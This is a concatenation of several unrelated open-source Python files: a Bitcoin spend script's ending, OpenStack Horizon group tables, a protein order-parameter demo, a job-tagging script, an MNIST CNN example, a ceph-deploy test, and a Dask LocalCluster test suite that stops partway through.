print("%s %.8f %s"%(address, info['total'], info['account']))
else:
fee = Decimal(options.fee)
amount = Decimal(options.amount)
while unlock_wallet(bitcoind) == False:
pass # Keep asking for passphrase until they get it right
txdata = create_tx(bitcoind, options.fromaddresses.split(","), options.to, amount, fee)
sanity_test_fee(bitcoind, txdata, amount*Decimal("0.01"))
if options.dry_run:
print(txdata)
else:
txid = bitcoind.sendrawtransaction(txdata)
print(txid)
if __name__ == '__main__':
main()
| DavidSantamaria/Om | contrib/spendfrom/spendfrom.py | Python | mit | 10,053 | 0.005968 |
# Copyright 2013 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
from django.core.urlresolvers import reverse
from django.template import defaultfilters
from django.utils.translation import ugettext_lazy as _
from horizon import tables
from openstack_dashboard import api
from openstack_dashboard.dashboards.identity.groups import constants
LOG = logging.getLogger(__name__)
LOGOUT_URL = 'logout'
STATUS_CHOICES = (
("true", True),
("false", False)
)
class CreateGroupLink(tables.LinkAction):
name = "create"
verbose_name = _("Create Group")
url = constants.GROUPS_CREATE_URL
classes = ("ajax-modal",)
icon = "plus"
policy_rules = (("identity", "identity:create_group"),)
def allowed(self, request, group):
return api.keystone.keystone_can_edit_group()
class EditGroupLink(tables.LinkAction):
name = "edit"
verbose_name = _("Edit Group")
url = constants.GROUPS_UPDATE_URL
classes = ("ajax-modal",)
icon = "pencil"
policy_rules = (("identity", "identity:update_group"),)
def allowed(self, request, group):
return api.keystone.keystone_can_edit_group()
class DeleteGroupsAction(tables.DeleteAction):
name = "delete"
data_type_singular = _("Group")
data_type_plural = _("Groups")
policy_rules = (("identity", "identity:delete_group"),)
def allowed(self, request, datum):
return api.keystone.keystone_can_edit_group()
def delete(self, request, obj_id):
LOG.info('Deleting group "%s".' % obj_id)
api.keystone.group_delete(request, obj_id)
class ManageUsersLink(tables.LinkAction):
name = "users"
verbose_name = _("Modify Users")
url = constants.GROUPS_MANAGE_URL
icon = "pencil"
policy_rules = (("identity", "identity:get_group"),
("identity", "identity:list_users"),)
def allowed(self, request, datum):
return api.keystone.keystone_can_edit_group()
class GroupFilterAction(tables.FilterAction):
def filter(self, table, groups, filter_string):
"""Naive case-insensitive search."""
q = filter_string.lower()
def comp(group):
if q in group.name.lower():
return True
return False
return filter(comp, groups)
class GroupsTable(tables.DataTable):
name = tables.Column('name', verbose_name=_('Name'))
description = tables.Column(lambda obj: getattr(obj, 'description', None),
verbose_name=_('Description'))
id = tables.Column('id', verbose_name=_('Group ID'))
class Meta:
name = "groups"
verbose_name = _("Groups")
row_actions = (ManageUsersLink, EditGroupLink, DeleteGroupsAction)
table_actions = (GroupFilterAction, CreateGroupLink,
DeleteGroupsAction)
class UserFilterAction(tables.FilterAction):
def filter(self, table, users, filter_string):
"""Naive case-insensitive search."""
q = filter_string.lower()
return [user for user in users
if q in user.name.lower()
or q in getattr(user, 'email', '').lower()]
class RemoveMembers(tables.DeleteAction):
name = "removeGroupMember"
action_present = _("Remove")
action_past = _("Removed")
data_type_singular = _("User")
data_type_plural = _("Users")
policy_rules = (("identity", "identity:remove_user_from_group"),)
def allowed(self, request, user=None):
return api.keystone.keystone_can_edit_group()
def action(self, request, obj_id):
user_obj = self.table.get_object_by_id(obj_id)
group_id = self.table.kwargs['group_id']
LOG.info('Removing user %s from group %s.' % (user_obj.id,
group_id))
api.keystone.remove_group_user(request,
group_id=group_id,
user_id=user_obj.id)
# TODO(lin-hua-cheng): Fix the bug when removing current user
# Keystone revokes the token of the user removed from the group.
# If the logon user was removed, redirect the user to logout.
class AddMembersLink(tables.LinkAction):
name = "add_user_link"
verbose_name = _("Add...")
classes = ("ajax-modal",)
icon = "plus"
url = constants.GROUPS_ADD_MEMBER_URL
policy_rules = (("identity", "identity:list_users"),
("identity", "identity:add_user_to_group"),)
def allowed(self, request, user=None):
return api.keystone.keystone_can_edit_group()
def get_link_url(self, datum=None):
return reverse(self.url, kwargs=self.table.kwargs)
class UsersTable(tables.DataTable):
name = tables.Column('name', verbose_name=_('User Name'))
email = tables.Column('email', verbose_name=_('Email'),
filters=[defaultfilters.escape,
defaultfilters.urlize])
id = tables.Column('id', verbose_name=_('User ID'))
enabled = tables.Column('enabled', verbose_name=_('Enabled'),
status=True,
status_choices=STATUS_CHOICES,
empty_value="False")
class GroupMembersTable(UsersTable):
class Meta:
name = "group_members"
verbose_name = _("Group Members")
table_actions = (UserFilterAction, AddMembersLink, RemoveMembers)
class AddMembers(tables.BatchAction):
name = "addMember"
action_present = _("Add")
action_past = _("Added")
data_type_singular = _("User")
data_type_plural = _("Users")
icon = "plus"
requires_input = True
success_url = constants.GROUPS_MANAGE_URL
policy_rules = (("identity", "identity:add_user_to_group"),)
def allowed(self, request, user=None):
return api.keystone.keystone_can_edit_group()
def action(self, request, obj_id):
user_obj = self.table.get_object_by_id(obj_id)
group_id = self.table.kwargs['group_id']
LOG.info('Adding user %s to group %s.' % (user_obj.id,
group_id))
api.keystone.add_group_user(request,
group_id=group_id,
user_id=user_obj.id)
# TODO(lin-hua-cheng): Fix the bug when adding current user
# Keystone revokes the token of the user added to the group.
# If the logon user was added, redirect the user to logout.
def get_success_url(self, request=None):
group_id = self.table.kwargs.get('group_id', None)
return reverse(self.success_url, args=[group_id])
class GroupNonMembersTable(UsersTable):
class Meta:
name = "group_non_members"
verbose_name = _("Non-Members")
table_actions = (UserFilterAction, AddMembers)
| zouyapeng/horizon-newtouch | openstack_dashboard/dashboards/identity/groups/tables.py | Python | apache-2.0 | 7,450 | 0 |
#!/usr/bin/env python
# This is a demonstration of how to compute S2 order parameters from bond vector correlation functions.
# The S2 estimation is done with the method described in:
# Trbovic et al. Proteins (2008). doi:10.1002/prot.21750
from __future__ import print_function, division
import sys, os, glob
import MOPS as mops
import matplotlib.pyplot as plt
# the correlation functions are stored in a subfolder of the current working directory
# after running test_corr.py
corrpath = "./MOPS_test_corr_fit"
if not os.path.isdir(corrpath):
print("No correlation functions found.")
print("Please run test_corr_fit.py first.")
sys.exit(1)
# load correlation functions
corrFilenames = glob.glob(corrpath + '/*.zip')
op = mops.OrderParameter(corrfilenames=corrFilenames)
# predict order parameters, take only converged correlation functions into account
op.estimate("mean", converged=True)
# extract information
S2 = op.S2mean
S2_std = op.S2std
S2_err = op.S2error # = S2.std / <number subtrajectories>
avgcorr = op.avgcorr # correlation function object with averaged correlation functions over all subtrajectories
corr = avgcorr.corr # numerical correlation functions, array of shape = (nresidues, timeframes)
corrlist = op.corrlist # list of correlation functions per subtrajectory
resids = op.avgcorr.resid[0] # residue ID of the first residue of the bond vector
residx = op.avgcorr.resid[0] # residue index (0-based)
resnames = op.avgcorr.resname[0] # residue name
atomnames = op.avgcorr.atomname[0] # atom name
plt.bar(resids, S2, yerr=S2_std)
plt.ylim(0,1)
plt.xlabel('Reisdue Number')
plt.ylabel(r'S$^2$')
plt.show()
| schilli/MOPS | MOPS/demo/demo_mean.py | Python | gpl-3.0 | 1,694 | 0.013577 |
from optparse import OptionParser
from application.database import global_db
from application.setup import create_app, setup_database, register_blueprints, load_cluster_config
from core.job.models import Job
from core.monitoring.models import JobPerformance
from core.tag.models import JobTag, Tag
from modules.autotag.models import AutoTag
def run(config: str):
app = create_app(config)
load_cluster_config("cluster_config/", app)
app.logger.info("loading db")
setup_database(app, False)
app.logger.info("loading blueprints")
register_blueprints(app)
return app
if __name__ == '__main__':
parser = OptionParser()
parser.add_option("-c", "--config", dest="config", default="dev", help="[dev]elopment or [prod]uction configuration")
parser.add_option("-t", "--t_end", dest="t_end", default=1483025545, help="include tasks completed after [t_end] timestamp")
(options, args) = parser.parse_args()
app = run(options.config)
@app.before_first_request
def tagit():
print("starting tagging")
conditions = []
for autotag in AutoTag.query.all():
conditions.append((autotag.compile_condition(), Tag.query.get(autotag.fk_tag_id).label))
query = global_db.session \
.query(Job, JobPerformance, JobTag) \
.filter(Job.t_end > options.t_end) \
.join(JobPerformance)\
.join(JobTag)
for job,perf,job_tag in query.all():
tags = ""
for condition, label in conditions:
try:
if condition(job, perf):
tags += ";{0}".format(label)
except:
pass
print("{0},{1}".format(job.id, tags))
app.run(host=app.config.get("HOST", "localhost"), port=app.config.get("PORT", 5000) + 10, use_reloader=False)
| srcc-msu/job_statistics | tagit.py | Python | mit | 1,689 | 0.03138 |
import theano
import numpy as np
from sklearn.preprocessing import OneHotEncoder
from sklearn import cross_validation, metrics, datasets
from neupy import algorithms, layers, environment
environment.reproducible()
theano.config.floatX = 'float32'
mnist = datasets.fetch_mldata('MNIST original')
target_scaler = OneHotEncoder()
target = mnist.target.reshape((-1, 1))
target = target_scaler.fit_transform(target).todense()
data = mnist.data / 255.
data = data - data.mean(axis=0)
n_samples = data.shape[0]
data = data.reshape((n_samples, 1, 28, 28))
x_train, x_test, y_train, y_test = cross_validation.train_test_split(
data.astype(np.float32),
target.astype(np.float32),
train_size=(6 / 7.)
)
network = algorithms.Adadelta(
[
layers.Convolution((32, 1, 3, 3)),
layers.Relu(),
layers.Convolution((48, 32, 3, 3)),
layers.Relu(),
layers.MaxPooling((2, 2)),
layers.Dropout(0.2),
layers.Reshape(),
layers.Relu(48 * 12 * 12),
layers.Dropout(0.3),
layers.Softmax(200),
layers.ArgmaxOutput(10),
],
error='categorical_crossentropy',
step=1.0,
verbose=True,
shuffle_data=True,
epochs_step_minimizator=8,
addons=[algorithms.SimpleStepMinimization],
)
network.architecture()
network.train(x_train, y_train, x_test, y_test, epochs=6)
y_predicted = network.predict(x_test)
y_test_labels = np.asarray(y_test.argmax(axis=1)).reshape(len(y_test))
print(metrics.classification_report(y_test_labels, y_predicted))
score = metrics.accuracy_score(y_test_labels, y_predicted)
print("Validation accuracy: {:.2f}%".format(100 * score))
| stczhc/neupy | examples/gd/mnist_cnn.py | Python | mit | 1,657 | 0 |
from ceph_deploy.hosts.alt.install import map_components, NON_SPLIT_PACKAGES
class TestALTMapComponents(object):
def test_valid(self):
pkgs = map_components(NON_SPLIT_PACKAGES, ['ceph-osd', 'ceph-common', 'ceph-radosgw'])
assert 'ceph' in pkgs
assert 'ceph-common' in pkgs
assert 'ceph-radosgw' in pkgs
assert 'ceph-osd' not in pkgs
| ceph/ceph-deploy | ceph_deploy/tests/unit/hosts/test_altlinux.py | Python | mit | 379 | 0.002639 |
import asyncio
from functools import partial
import gc
import subprocess
import sys
from time import sleep
from threading import Lock
import unittest
import weakref
from distutils.version import LooseVersion
from tornado.ioloop import IOLoop
import tornado
from tornado.httpclient import AsyncHTTPClient
import pytest
from dask.system import CPU_COUNT
from distributed import Client, Worker, Nanny, get_client
from distributed.deploy.local import LocalCluster, nprocesses_nthreads
from distributed.metrics import time
from distributed.system import MEMORY_LIMIT
from distributed.utils_test import ( # noqa: F401
clean,
cleanup,
inc,
gen_test,
slowinc,
assert_cannot_connect,
assert_can_connect_locally_4,
assert_can_connect_from_everywhere_4,
assert_can_connect_from_everywhere_4_6,
captured_logger,
tls_only_security,
)
from distributed.utils_test import loop # noqa: F401
from distributed.utils import sync, TimeoutError
from distributed.deploy.utils_test import ClusterTest
def test_simple(loop):
with LocalCluster(
4,
scheduler_port=0,
processes=False,
silence_logs=False,
dashboard_address=None,
loop=loop,
) as c:
with Client(c) as e:
x = e.submit(inc, 1)
x.result()
assert x.key in c.scheduler.tasks
assert any(w.data == {x.key: 2} for w in c.workers.values())
assert e.loop is c.loop
def test_local_cluster_supports_blocked_handlers(loop):
with LocalCluster(blocked_handlers=["run_function"], n_workers=0, loop=loop) as c:
with Client(c) as client:
with pytest.raises(ValueError) as exc:
client.run_on_scheduler(lambda x: x, 42)
assert "'run_function' handler has been explicitly disallowed in Scheduler" in str(
exc.value
)
def test_close_twice():
with LocalCluster() as cluster:
with Client(cluster.scheduler_address) as client:
f = client.map(inc, range(100))
client.gather(f)
with captured_logger("tornado.application") as log:
cluster.close()
cluster.close()
sleep(0.5)
log = log.getvalue()
assert not log
def test_procs():
with LocalCluster(
2,
scheduler_port=0,
processes=False,
threads_per_worker=3,
dashboard_address=None,
silence_logs=False,
) as c:
assert len(c.workers) == 2
assert all(isinstance(w, Worker) for w in c.workers.values())
with Client(c.scheduler.address) as e:
assert all(w.nthreads == 3 for w in c.workers.values())
assert all(isinstance(w, Worker) for w in c.workers.values())
repr(c)
with LocalCluster(
2,
scheduler_port=0,
processes=True,
threads_per_worker=3,
dashboard_address=None,
silence_logs=False,
) as c:
assert len(c.workers) == 2
assert all(isinstance(w, Nanny) for w in c.workers.values())
with Client(c.scheduler.address) as e:
assert all(v == 3 for v in e.nthreads().values())
c.scale(3)
assert all(isinstance(w, Nanny) for w in c.workers.values())
repr(c)
def test_move_unserializable_data():
"""
Test that unserializable data is still fine to transfer over inproc
transports.
"""
with LocalCluster(
processes=False, silence_logs=False, dashboard_address=None
) as cluster:
assert cluster.scheduler_address.startswith("inproc://")
assert cluster.workers[0].address.startswith("inproc://")
with Client(cluster) as client:
lock = Lock()
x = client.scatter(lock)
y = client.submit(lambda x: x, x)
assert y.result() is lock
def test_transports_inproc():
"""
Test the transport chosen by LocalCluster depending on arguments.
"""
with LocalCluster(
1, processes=False, silence_logs=False, dashboard_address=None
) as c:
assert c.scheduler_address.startswith("inproc://")
assert c.workers[0].address.startswith("inproc://")
with Client(c.scheduler.address) as e:
assert e.submit(inc, 4).result() == 5
def test_transports_tcp():
# Have nannies => need TCP
with LocalCluster(
1, processes=True, silence_logs=False, dashboard_address=None
) as c:
assert c.scheduler_address.startswith("tcp://")
assert c.workers[0].address.startswith("tcp://")
with Client(c.scheduler.address) as e:
assert e.submit(inc, 4).result() == 5
def test_transports_tcp_port():
# Scheduler port specified => need TCP
with LocalCluster(
1,
processes=False,
scheduler_port=8786,
silence_logs=False,
dashboard_address=None,
) as c:
assert c.scheduler_address == "tcp://127.0.0.1:8786"
assert c.workers[0].address.startswith("tcp://")
with Client(c.scheduler.address) as e:
assert e.submit(inc, 4).result() == 5
class LocalTest(ClusterTest, unittest.TestCase):
Cluster = partial(LocalCluster, silence_logs=False, dashboard_address=None)
kwargs = {"dashboard_address": None, "processes": False}
def test_Client_with_local(loop):
with LocalCluster(
1, scheduler_port=0, silence_logs=False, dashboard_address=None, loop=loop
) as c:
with Client(c) as e:
assert len(e.nthreads()) == len(c.workers)
assert c.scheduler_address in repr(c)
def test_Client_solo(loop):
with Client(loop=loop, silence_logs=False) as c:
pass
assert c.cluster.status == "closed"
@gen_test()
async def test_duplicate_clients():
pytest.importorskip("bokeh")
c1 = await Client(
processes=False, silence_logs=False, dashboard_address=9876, asynchronous=True
)
with pytest.warns(Warning) as info:
c2 = await Client(
processes=False,
silence_logs=False,
dashboard_address=9876,
asynchronous=True,
)
assert "dashboard" in c1.cluster.scheduler.services
assert "dashboard" in c2.cluster.scheduler.services
assert any(
all(
word in str(msg.message).lower()
for word in ["9876", "running", "already in use"]
)
for msg in info.list
)
await c1.close()
await c2.close()
def test_Client_kwargs(loop):
with Client(loop=loop, processes=False, n_workers=2, silence_logs=False) as c:
assert len(c.cluster.workers) == 2
assert all(isinstance(w, Worker) for w in c.cluster.workers.values())
assert c.cluster.status == "closed"
def test_Client_unused_kwargs_with_cluster(loop):
with LocalCluster() as cluster:
with pytest.raises(Exception) as argexcept:
c = Client(cluster, n_workers=2, dashboard_port=8000, silence_logs=None)
assert (
str(argexcept.value)
== "Unexpected keyword arguments: ['dashboard_port', 'n_workers', 'silence_logs']"
)
def test_Client_unused_kwargs_with_address(loop):
with pytest.raises(Exception) as argexcept:
c = Client(
"127.0.0.1:8786", n_workers=2, dashboard_port=8000, silence_logs=None
)
assert (
str(argexcept.value)
== "Unexpected keyword arguments: ['dashboard_port', 'n_workers', 'silence_logs']"
)
def test_Client_twice(loop):
with Client(loop=loop, silence_logs=False, dashboard_address=None) as c:
with Client(loop=loop, silence_logs=False, dashboard_address=None) as f:
assert c.cluster.scheduler.port != f.cluster.scheduler.port
@pytest.mark.asyncio
async def test_client_constructor_with_temporary_security(cleanup):
pytest.importorskip("cryptography")
async with Client(
security=True, silence_logs=False, dashboard_address=None, asynchronous=True
) as c:
assert c.cluster.scheduler_address.startswith("tls")
assert c.security == c.cluster.security
@pytest.mark.asyncio
async def test_defaults(cleanup):
async with LocalCluster(
scheduler_port=0, silence_logs=False, dashboard_address=None, asynchronous=True
) as c:
assert sum(w.nthreads for w in c.workers.values()) == CPU_COUNT
assert all(isinstance(w, Nanny) for w in c.workers.values())
@pytest.mark.asyncio
async def test_defaults_2(cleanup):
async with LocalCluster(
processes=False,
scheduler_port=0,
silence_logs=False,
dashboard_address=None,
asynchronous=True,
) as c:
assert sum(w.nthreads for w in c.workers.values()) == CPU_COUNT
assert all(isinstance(w, Worker) for w in c.workers.values())
assert len(c.workers) == 1
@pytest.mark.asyncio
async def test_defaults_3(cleanup):
async with LocalCluster(
n_workers=2,
scheduler_port=0,
silence_logs=False,
dashboard_address=None,
asynchronous=True,
) as c:
if CPU_COUNT % 2 == 0:
expected_total_threads = max(2, CPU_COUNT)
else:
# n_workers not a divisor of _nthreads => threads are overcommitted
expected_total_threads = max(2, CPU_COUNT + 1)
assert sum(w.nthreads for w in c.workers.values()) == expected_total_threads
@pytest.mark.asyncio
async def test_defaults_4(cleanup):
async with LocalCluster(
threads_per_worker=CPU_COUNT * 2,
scheduler_port=0,
silence_logs=False,
dashboard_address=None,
asynchronous=True,
) as c:
assert len(c.workers) == 1
@pytest.mark.asyncio
async def test_defaults_5(cleanup):
async with LocalCluster(
n_workers=CPU_COUNT * 2,
scheduler_port=0,
silence_logs=False,
dashboard_address=None,
asynchronous=True,
) as c:
assert all(w.nthreads == 1 for w in c.workers.values())
@pytest.mark.asyncio
async def test_defaults_6(cleanup):
async with LocalCluster(
threads_per_worker=2,
n_workers=3,
scheduler_port=0,
silence_logs=False,
dashboard_address=None,
asynchronous=True,
) as c:
assert len(c.workers) == 3
assert all(w.nthreads == 2 for w in c.workers.values())
@pytest.mark.asyncio
async def test_worker_params(cleanup):
async with LocalCluster(
processes=False,
n_workers=2,
scheduler_port=0,
silence_logs=False,
dashboard_address=None,
memory_limit=500,
asynchronous=True,
) as c:
assert [w.memory_limit for w in c.workers.values()] == [500] * 2
@pytest.mark.asyncio
async def test_memory_limit_none(cleanup):
async with LocalCluster(
n_workers=2,
scheduler_port=0,
silence_logs=False,
processes=False,
dashboard_address=None,
memory_limit=None,
asynchronous=True,
) as c:
w = c.workers[0]
assert type(w.data) is dict
assert w.memory_limit is None
def test_cleanup():
with clean(threads=False):
c = LocalCluster(
2, scheduler_port=0, silence_logs=False, dashboard_address=None
)
port = c.scheduler.port
c.close()
c2 = LocalCluster(
2, scheduler_port=port, silence_logs=False, dashboard_address=None
)
c2.close()
def test_repeated():
with clean(threads=False):
with LocalCluster(
0, scheduler_port=8448, silence_logs=False, dashboard_address=None
) as c:
pass
with LocalCluster(
0, scheduler_port=8448, silence_logs=False, dashboard_address=None
) as c:
pass
@pytest.mark.parametrize("processes", [True, False])
def test_bokeh(loop, processes):
pytest.importorskip("bokeh")
requests = pytest.importorskip("requests")
with LocalCluster(
n_workers=0,
scheduler_port=0,
silence_logs=False,
loop=loop,
processes=processes,
dashboard_address=0,
) as c:
bokeh_port = c.scheduler.http_server.port
url = "http://127.0.0.1:%d/status/" % bokeh_port
start = time()
while True:
response = requests.get(url)
if response.ok:
break
assert time() < start + 20
sleep(0.01)
# 'localhost' also works
response = requests.get("http://localhost:%d/status/" % bokeh_port)
assert response.ok
with pytest.raises(requests.RequestException):
requests.get(url, timeout=0.2)
def test_blocks_until_full(loop):
with Client(loop=loop) as c:
assert len(c.nthreads()) > 0
@pytest.mark.asyncio
async def test_scale_up_and_down():
async with LocalCluster(
0,
scheduler_port=0,
processes=False,
silence_logs=False,
dashboard_address=None,
asynchronous=True,
) as cluster:
async with Client(cluster, asynchronous=True) as c:
assert not cluster.workers
cluster.scale(2)
await cluster
assert len(cluster.workers) == 2
assert len(cluster.scheduler.nthreads) == 2
cluster.scale(1)
await cluster
assert len(cluster.workers) == 1
@pytest.mark.xfail(
sys.version_info >= (3, 8) and LooseVersion(tornado.version) < "6.0.3",
reason="Known issue with Python 3.8 and Tornado < 6.0.3. "
"See https://github.com/tornadoweb/tornado/pull/2683.",
strict=True,
)
def test_silent_startup():
code = """if 1:
from time import sleep
from distributed import LocalCluster
if __name__ == "__main__":
with LocalCluster(1, dashboard_address=None, scheduler_port=0):
sleep(.1)
"""
out = subprocess.check_output(
[sys.executable, "-Wi", "-c", code], stderr=subprocess.STDOUT
)
out = out.decode()
try:
assert not out
except AssertionError:
print("=== Cluster stdout / stderr ===")
print(out)
raise
def test_only_local_access(loop):
with LocalCluster(
0, scheduler_port=0, silence_logs=False, dashboard_address=None, loop=loop
) as c:
sync(loop, assert_can_connect_locally_4, c.scheduler.port)
def test_remote_access(loop):
with LocalCluster(
0,
scheduler_port=0,
silence_logs=False,
dashboard_address=None,
host="",
loop=loop,
) as c:
sync(loop, assert_can_connect_from_everywhere_4_6, c.scheduler.port)
@pytest.mark.parametrize("n_workers", [None, 3])
def test_memory(loop, n_workers):
with LocalCluster(
n_workers=n_workers,
scheduler_port=0,
processes=False,
silence_logs=False,
dashboard_address=None,
loop=loop,
) as cluster:
assert sum(w.memory_limit for w in cluster.workers.values()) <= MEMORY_LIMIT
@pytest.mark.parametrize("n_workers", [None, 3])
def test_memory_nanny(loop, n_workers):
with LocalCluster(
n_workers=n_workers,
scheduler_port=0,
processes=True,
silence_logs=False,
dashboard_address=None,
loop=loop,
) as cluster:
with Client(cluster.scheduler_address, loop=loop) as c:
info = c.scheduler_info()
assert (
sum(w["memory_limit"] for w in info["workers"].values()) <= MEMORY_LIMIT
)
def test_death_timeout_raises(loop):
with pytest.raises(TimeoutError):
with LocalCluster(
scheduler_port=0,
silence_logs=False,
death_timeout=1e-10,
dashboard_address=None,
loop=loop,
) as cluster:
pass
LocalCluster._instances.clear() # ignore test hygiene checks
@pytest.mark.asyncio
async def test_bokeh_kwargs(cleanup):
pytest.importorskip("bokeh")
async with LocalCluster(
n_workers=0,
scheduler_port=0,
silence_logs=False,
dashboard_address=0,
asynchronous=True,
scheduler_kwargs={"http_prefix": "/foo"},
) as c:
client = AsyncHTTPClient()
response = await client.fetch(
"http://localhost:{}/foo/status".format(c.scheduler.http_server.port)
)
assert "bokeh" in response.body.decode()
def test_io_loop_periodic_callbacks(loop):
with LocalCluster(
loop=loop, port=0, dashboard_address=None, silence_logs=False
) as cluster:
assert cluster.scheduler.loop is loop
for pc in cluster.scheduler.periodic_callbacks.values():
assert pc.io_loop is loop
for worker in cluster.workers.values():
for pc in worker.periodic_callbacks.values():
assert pc.io_loop is loop
def test_logging():
"""
Workers and scheduler have logs even when silenced
"""
with LocalCluster(1, processes=False, dashboard_address=None) as c:
assert c.scheduler._deque_handler.deque
assert c.workers[0]._deque_handler.deque
def test_ipywidgets(loop):
ipywidgets = pytest.importorskip("ipywidgets")
with LocalCluster(
n_workers=0,
scheduler_port=0,
silence_logs=False,
loop=loop,
dashboard_address=False,
processes=False,
) as cluster:
cluster._ipython_display_()
box = cluster._cached_widget
assert isinstance(box, ipywidgets.Widget)
def test_no_ipywidgets(loop, monkeypatch):
from unittest.mock import MagicMock
mock_display = MagicMock()
monkeypatch.setitem(sys.modules, "ipywidgets", None)
monkeypatch.setitem(sys.modules, "IPython.display", mock_display)
with LocalCluster(
n_workers=0,
scheduler_port=0,
silence_logs=False,
loop=loop,
dashboard_address=False,
processes=False,
) as cluster:
cluster._ipython_display_()
args, kwargs = mock_display.display.call_args
res = args[0]
assert kwargs == {"raw": True}
assert isinstance(res, dict)
assert "text/plain" in res
assert "text/html" in res
def test_scale(loop):
""" Directly calling scale both up and down works as expected """
with LocalCluster(
scheduler_port=0,
silence_logs=False,
loop=loop,
dashboard_address=False,
processes=False,
n_workers=0,
) as cluster:
assert not cluster.scheduler.workers
cluster.scale(3)
start = time()
while len(cluster.scheduler.workers) != 3:
sleep(0.01)
assert time() < start + 5, len(cluster.scheduler.workers)
sleep(0.2) # let workers settle # TODO: remove need for this
cluster.scale(2)
start = time()
while len(cluster.scheduler.workers) != 2:
sleep(0.01)
assert time() < start + 5, len(cluster.scheduler.workers)
def test_adapt(loop):
with LocalCluster(
scheduler_port=0,
silence_logs=False,
loop=loop,
dashboard_address=False,
processes=False,
n_workers=0,
) as cluster:
cluster.adapt(minimum=0, maximum=2, interval="10ms")
assert cluster._adaptive.minimum == 0
assert cluster._adaptive.maximum == 2
ref = weakref.ref(cluster._adaptive)
cluster.adapt(minimum=1, maximum=2, interval="10ms")
assert cluster._adaptive.minimum == 1
gc.collect()
# the old Adaptive class sticks around, not sure why
# start = time()
# while ref():
# sleep(0.01)
# gc.collect()
# assert time() < start + 5
start = time()
while len(cluster.scheduler.workers) != 1:
sleep(0.01)
assert time() < start + 5
def test_adapt_then_manual(loop):
""" We can revert from adaptive, back to manual """
with LocalCluster(
scheduler_port=0,
silence_logs=False,
loop=loop,
dashboard_address=False,
processes=False,
n_workers=8,
) as cluster:
sleep(0.1)
cluster.adapt(minimum=0, maximum=4, interval="10ms")
start = time()
while cluster.scheduler.workers or cluster.workers:
sleep(0.1)
assert time() < start + 5
assert not cluster.workers
with Client(cluster) as client:
futures = client.map(slowinc, range(1000), delay=0.1)
sleep(0.2)
cluster._adaptive.stop()
sleep(0.2)
cluster.scale(2)
start = time()
while len(cluster.scheduler.workers) != 2:
sleep(0.1)
assert time() < start + 5
@pytest.mark.parametrize("temporary", [True, False])
def test_local_tls(loop, temporary):
if temporary:
pytest.importorskip("cryptography")
security = True
else:
security = tls_only_security()
with LocalCluster(
n_workers=0,
scheduler_port=8786,
silence_logs=False,
security=security,
dashboard_address=False,
host="tls://0.0.0.0",
loop=loop,
) as c:
sync(
loop,
assert_can_connect_from_everywhere_4,
c.scheduler.port,
protocol="tls",
timeout=3,
**c.security.get_connection_args("client"),
)
# If we connect to a TLS localculster without ssl information we should fail
sync(
loop,
assert_cannot_connect,
addr="tcp://127.0.0.1:%d" % c.scheduler.port,
exception_class=RuntimeError,
**c.security.get_connection_args("client"),
)
@gen_test()
async def test_scale_retires_workers():
class MyCluster(LocalCluster):
def scale_down(self, *args, **kwargs):
pass
loop = IOLoop.current()
cluster = await MyCluster(
0,
scheduler_port=0,
processes=False,
silence_logs=False,
dashboard_address=None,
loop=loop,
asynchronous=True,
)
c = await Client(cluster, asynchronous=True)
assert not cluster.workers
await cluster.scale(2)
start = time()
while len(cluster.scheduler.workers) != 2:
await asyncio.sleep(0.01)
assert time() < start + 3
await cluster.scale(1)
start = time()
while len(cluster.scheduler.workers) != 1:
await asyncio.sleep(0.01)
assert time() < start + 3
await c.close()
await cluster.close()
def test_local_tls_restart(loop):
from distributed.utils_test import tls_only_security
security = tls_only_security()
with LocalCluster(
n_workers=1,
scheduler_port=8786,
silence_logs=False,
security=security,
dashboard_address=False,
host="tls://0.0.0.0",
loop=loop,
) as c:
with Client(c.scheduler.address, loop=loop, security=security) as client:
workers_before = set(client.scheduler_info()["workers"])
assert client.submit(inc, 1).result() == 2
client.restart()
workers_after = set(client.scheduler_info()["workers"])
assert client.submit(inc, 2).result() == 3
assert workers_before != workers_after
def test_default_process_thread_breakdown():
assert nprocesses_nthreads(1) == (1, 1)
assert nprocesses_nthreads(4) == (4, 1)
assert nprocesses_nthreads(5) == (5, 1)
assert nprocesses_nthreads(8) == (4, 2)
assert nprocesses_nthreads(12) in ((6, 2), (4, 3))
assert nprocesses_nthreads(20) == (5, 4)
assert nprocesses_nthreads(24) in ((6, 4), (8, 3))
assert nprocesses_nthreads(32) == (8, 4)
assert nprocesses_nthreads(40) in ((8, 5), (10, 4))
assert nprocesses_nthreads(80) in ((10, 8), (16, 5))
def test_asynchronous_property(loop):
with LocalCluster(
4,
scheduler_port=0,
processes=False,
silence_logs=False,
dashboard_address=None,
loop=loop,
) as cluster:
async def _():
assert cluster.asynchronous
cluster.sync(_)
def test_protocol_inproc(loop):
with LocalCluster(protocol="inproc://", loop=loop, processes=False) as cluster:
assert cluster.scheduler.address.startswith("inproc://")
def test_protocol_tcp(loop):
with LocalCluster(
protocol="tcp", loop=loop, n_workers=0, processes=False
) as cluster:
assert cluster.scheduler.address.startswith("tcp://")
@pytest.mark.skipif(
not sys.platform.startswith("linux"), reason="Need 127.0.0.2 to mean localhost"
)
def test_protocol_ip(loop):
with LocalCluster(
host="tcp://127.0.0.2", loop=loop, n_workers=0, processes=False
) as cluster:
assert cluster.scheduler.address.startswith("tcp://127.0.0.2")
class MyWorker(Worker):
pass
def test_worker_class_worker(loop):
with LocalCluster(
n_workers=2,
loop=loop,
worker_class=MyWorker,
processes=False,
scheduler_port=0,
dashboard_address=None,
) as cluster:
assert all(isinstance(w, MyWorker) for w in cluster.workers.values())
def test_worker_class_nanny(loop):
class MyNanny(Nanny):
pass
with LocalCluster(
n_workers=2,
loop=loop,
worker_class=MyNanny,
scheduler_port=0,
dashboard_address=None,
) as cluster:
assert all(isinstance(w, MyNanny) for w in cluster.workers.values())
@pytest.mark.asyncio
async def test_worker_class_nanny_async(cleanup):
class MyNanny(Nanny):
pass
async with LocalCluster(
n_workers=2,
worker_class=MyNanny,
scheduler_port=0,
dashboard_address=None,
asynchronous=True,
) as cluster:
assert all(isinstance(w, MyNanny) for w in cluster.workers.values())
def test_starts_up_sync(loop):
cluster = LocalCluster(
n_workers=2,
loop=loop,
